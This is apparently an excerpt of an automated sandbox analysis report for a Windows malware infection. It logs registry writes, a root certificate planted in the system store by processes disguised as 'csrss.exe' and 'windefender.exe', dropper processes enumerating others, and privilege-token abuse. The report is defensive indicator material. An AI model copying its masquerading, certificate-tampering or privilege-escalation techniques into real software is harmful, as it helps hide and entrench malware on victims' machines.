Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\netsh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
